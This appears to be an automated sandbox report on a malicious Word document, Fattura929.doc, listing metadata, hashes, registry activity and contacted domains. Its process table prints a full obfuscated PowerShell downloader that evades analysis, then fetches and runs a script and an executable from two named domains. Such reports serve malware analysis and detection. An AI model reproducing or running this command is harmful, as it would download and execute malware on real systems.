| Field | Value |
|---|---|
| File name | Fattura929.doc |
| Full analysis | https://app.any.run/tasks/3fb5801a-305b-48da-a2cb-5e09d7edfa15 |
| Verdict | Malicious activity |
| Analysis date | August 13, 2019, 16:27:00 |
| OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags | |
| Indicators | |
| MIME | application/msword |
| File info | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.3, Code page: 1252, Author: Administrator, Template: Normal.dotm, Last Saved By: Administrator, Revision Number: 4, Name of Creating Application: Microsoft Office Word, Total Editing Time: 08:00, Create Time/Date: Mon Jul 22 14:22:00 2019, Last Saved Time/Date: Thu Aug 1 16:22:00 2019, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0 |
| MD5 | B8A8DE55B62B08FD1458538CC00973D8 |
| SHA1 | 87AE405DC261095E33500DAE3F62CCB55C659618 |
| SHA256 | 489B4899CE610CCA49BDBC20906D1C97F424551F216D85BC310630B03716A692 |
| SSDEEP | 1536:jC3hskRSSuclIyTPHkDD+WZbz+a9LmXBz9f/P5:jIRSSuclIyoDDe19 |
| Extension | Detected type |
|---|---|
| .doc | Microsoft Word document (54.2) |
| .doc | Microsoft Word document (old ver.) (32.2) |
| Property | Value |
|---|---|
| CompObjUserType | Microsoft Word 97-2003 Document |
| CompObjUserTypeLen | 32 |
| HeadingPairs | |
| TitleOfParts | - |
| HyperlinksChanged | No |
| SharedDoc | No |
| LinksUpToDate | No |
| ScaleCrop | No |
| AppVersion | 16 |
| CharCountWithSpaces | 1 |
| Paragraphs | 1 |
| Lines | 1 |
| Company | - |
| CodePage | Windows Latin 1 (Western European) |
| Security | None |
| Characters | 1 |
| Words | - |
| Pages | 1 |
| ModifyDate | 2019:08:01 15:22:00 |
| CreateDate | 2019:07:22 13:22:00 |
| TotalEditTime | 8.0 minutes |
| Software | Microsoft Office Word |
| RevisionNumber | 4 |
| LastModifiedBy | Administrator |
| Template | Normal.dotm |
| Comments | - |
| Keywords | - |
| Author | Administrator |
| Subject | - |
| Title | - |
| PID | CMD | Path | Indicators | Parent process |
|---|---|---|---|---|
| 3976 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Fattura929.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
| | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Word; Version: 14.0.6024.1000 | | | |
| 4084 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -c function a($a){ return [char]$a; };$sjyt='';59,105,102,40,40,40,71,101,116,45,87,109,105,79,98,106,101,99,116,32,45,99,108,97,115,115,32,87,105,110,51,50,95,67,111,109,112,117,116,101,114,83,121,115,116,101,109,32,45,80,114,111,112,101,114,116,121,32,77,111,100,101,108,41,46,77,111,100,101,108,32,45,109,97,116,99,104,32,34,86,105,114,116,117,97,108,66,111,120,124,86,77,119,97,114,101,124,75,86,77,34,41,32,45,111,114,32,40,40,71,101,116,45,85,73,67,117,108,116,117,114,101,41,46,78,97,109,101,32,45,109,97,116,99,104,32,34,82,79,124,67,78,124,85,65,124,66,89,124,82,85,34,41,41,123,32,101,120,105,116,59,32,125,59,36,102,98,102,103,61,32,74,111,105,110,45,80,97,116,104,32,36,101,110,118,58,116,101,109,112,32,34,87,52,57,57,48,56,48,49,46,106,115,34,59,36,99,104,103,120,61,32,74,111,105,110,45,80,97,116,104,32,36,101,110,118,58,116,101,109,112,32,34,67,114,121,112,115,114,118,46,101,120,101,34,59,116,114,121,123,40,78,101,119,45,79,98,106,101,99,116,32,78,101,116,46,87,101,98,67,108,105,101,110,116,41,46,68,111,119,110,108,111,97,100,83,116,114,105,110,103,40,34,104,116,116,112,58,47,47,100,114,105,118,101,46,100,101,101,115,99,114,101,97,116,105,111,110,115,116,111,114,101,46,99,111,109,47,63,110,101,101,100,61,106,115,105,38,118,105,100,61,100,51,38,101,118,103,121,116,34,41,124,111,117,116,45,102,105,108,101,32,36,102,98,102,103,59,83,116,97,114,116,45,80,114,111,99,101,115,115,32,36,102,98,102,103,59,125,99,97,116,99,104,123,125,59,116,114,121,123,32,40,78,101,119,45,79,98,106,101,99,116,32,78,101,116,46,87,101,98,67,108,105,101,110,116,41,46,68,111,119,110,108,111,97,100,70,105,108,101,40,34,104,116,116,112,58,47,47,107,111,112,101,46,100,101,101,115,115,111,108,117,116,105,111,110,115,100,101,109,111,46,99,111,109,47,114,101,108,111,97,100,63,115,100,99,119,34,44,36,99,104,103,120,41,59,32,83,116,97,114,116,45,80,114,111,99,101,115,115,32,36,99,104,103,120,59,125,99,97,116,99,104,123,125,59,59\|%{$zdxyd=a($_);$sjyt+=$zdxyd};iex $sjyt; | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | WINWORD.EXE |
| | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255) | | | |
| PID | Process | Operation | Key | Name | Value |
|---|---|---|---|---|---|
| 3976 | WINWORD.EXE | write | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems | &6? | 26363F00880F0000010000000000000000000000 |
| 3976 | WINWORD.EXE | write | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages | 1033 | Off |
| 3976 | WINWORD.EXE | write | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages | 1033 | On |
| 3976 | WINWORD.EXE | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage | WORDFiles | 1326252062 |
| 3976 | WINWORD.EXE | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage | ProductFiles | 1326252176 |
| 3976 | WINWORD.EXE | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage | ProductFiles | 1326252177 |
| 3976 | WINWORD.EXE | write | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word | MTTT | 880F0000D8320DF8F351D50100000000 |
| 3976 | WINWORD.EXE | write | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems | ?7? | 3F373F00880F000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000 |
| 3976 | WINWORD.EXE | delete value | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems | ?7? | 3F373F00880F000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000 |
| 3976 | WINWORD.EXE | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | UNCAsIntranet | 0 |
| PID | Process | Filename | Type | MD5 | SHA256 |
|---|---|---|---|---|---|
| 3976 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR9E86.tmp.cvr | — | — | — |
| 4084 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\3OP5OVKYEXWZUD31JV42.temp | — | — | — |
| 4084 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | A25A3218432767D044A42DFB20430D13 | 89B8F26BBB4687757C87D5EF3D77646AF493AFFCF68B572BD2D4D5CE07C97BE7 |
| 3976 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$ttura929.doc | pgc | 8E1A7D1CFDB6ADA0B3FBBAE88FA63FAA | 0CD1024807363C0F749B6149202258B40579B5E81D1A1F30B717012684D2862D |
| 4084 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF37a58b.TMP | binary | A25A3218432767D044A42DFB20430D13 | 89B8F26BBB4687757C87D5EF3D77646AF493AFFCF68B572BD2D4D5CE07C97BE7 |
| 3976 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | C5B8C883246A2DEBDFC1C1EE8F22BE3F | 9877F007EF2D6D926C246EF734160E9CA8CA0A7DF467C9A8F22AB6B2027CAADF |
| Domain | IP | Reputation |
|---|---|---|
| drive.deescreationstore.com | | malicious |
| kope.deessolutionsdemo.com | | unknown |